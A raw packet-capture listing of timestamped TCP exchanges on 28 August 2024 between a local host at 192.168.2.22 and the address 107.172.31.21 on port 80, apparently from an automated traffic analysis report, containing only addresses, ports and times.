                                                                      Aug 28, 2024 06:54:13.525958061 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.526078939 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.526089907 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.526102066 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.526132107 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.526196957 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.526256084 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.530626059 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.530637980 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.530649900 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.530675888 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.530683994 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.530695915 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.530735970 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.531065941 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.531078100 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.531089067 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.531111956 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.531125069 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.531136990 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.531174898 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.535006046 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535024881 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535037041 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535063982 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.535094976 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535106897 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535145044 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.535409927 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535422087 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535469055 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.535737991 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535756111 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.535794973 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.536086082 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536144018 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536154985 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536184072 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.536576033 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536647081 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536652088 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.536926031 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536941051 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.536973000 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.537254095 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.537300110 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.539819002 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.539896965 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.539947987 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.540029049 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540040016 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540052891 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540080070 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.540518045 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540566921 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.540579081 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540857077 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540887117 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540899038 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.540900946 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.540927887 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.540931940 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541280031 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541323900 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.541327953 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541340113 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541359901 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541373014 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.541749001 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541759014 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541766882 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541788101 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.541798115 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.541835070 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.542124987 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542164087 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542175055 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542185068 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542227983 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.542557955 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542573929 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542622089 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.542757034 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542772055 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.542815924 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.544667959 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544709921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544719934 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544740915 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544755936 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.544924021 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544933081 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544944048 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544955015 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.544969082 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.544992924 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.545278072 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545322895 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545332909 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545342922 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545367956 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.545682907 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545727968 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.545738935 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545749903 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545759916 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.545784950 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.546118975 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546165943 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.546171904 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546183109 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546192884 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546217918 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.546495914 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546540976 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546542883 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.546552896 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546562910 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546581030 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.546936989 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546948910 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546958923 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546974897 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.546986103 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547018051 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547319889 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547331095 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547341108 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547350883 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547365904 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547369003 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547380924 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547389984 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547421932 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547828913 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547841072 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547852039 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547864914 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.547874928 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.547907114 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548151016 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548161030 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548171997 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548197031 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548230886 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548242092 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548250914 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548263073 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548274994 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548275948 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548315048 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548737049 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548748016 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548758984 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548775911 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.548784971 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548825026 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.548988104 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549036980 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549048901 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549077034 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549081087 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.549864054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549875021 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549885988 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549910069 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.549947977 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549957037 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549968004 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.549993992 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.550117970 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.550160885 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.550183058 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551342964 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551352978 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551363945 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551398993 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551403046 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551414013 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551425934 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551440954 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551449060 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551520109 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551532030 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551543951 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551554918 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551563025 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551567078 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551578045 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551587105 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551599979 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551609993 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.551664114 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551672935 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.551796913 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.552748919 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552758932 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552772045 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552808046 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.552834988 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552845955 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552856922 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552870035 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552879095 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.552894115 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552905083 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552907944 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.552916050 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552942038 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.552979946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.552990913 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553002119 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553016901 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553035975 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553054094 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553600073 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553611040 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553622961 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553642988 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553682089 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553694010 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553704023 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553714991 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553726912 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553752899 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553752899 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553765059 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553797960 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553797960 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553809881 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553819895 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553832054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.553844929 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.553877115 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.554997921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555008888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555021048 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555046082 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.555071115 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555083036 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555095911 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555116892 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.555116892 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.555140018 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555151939 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555162907 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555176973 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555186033 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.555212975 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.555244923 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555255890 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555265903 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.555289030 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556292057 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556308031 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556318045 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556344986 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556586981 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556597948 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556610107 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556639910 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556665897 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556675911 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556687117 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556698084 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556704998 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556725025 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556751966 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556762934 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556772947 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556782961 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.556797028 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.556823015 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.557769060 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557782888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557794094 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557817936 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.557853937 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557863951 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557874918 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557881117 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557900906 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.557900906 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.557924032 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557935953 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.557976007 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558645964 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558696032 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558706045 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558737993 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558764935 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558775902 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558785915 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558798075 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558809996 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558834076 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558907986 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558918953 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558929920 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558940887 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558952093 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558954954 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558963060 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.558973074 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.558974981 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559000969 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.559027910 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559039116 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559048891 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559052944 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559079885 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.559967995 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559978008 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.559988976 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.560015917 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.560030937 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.560043097 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.560054064 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.560079098 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.561199903 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.561209917 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.561219931 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.561248064 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.561271906 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.561283112 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.561296940 CEST8049172107.172.31.21192.168.2.22
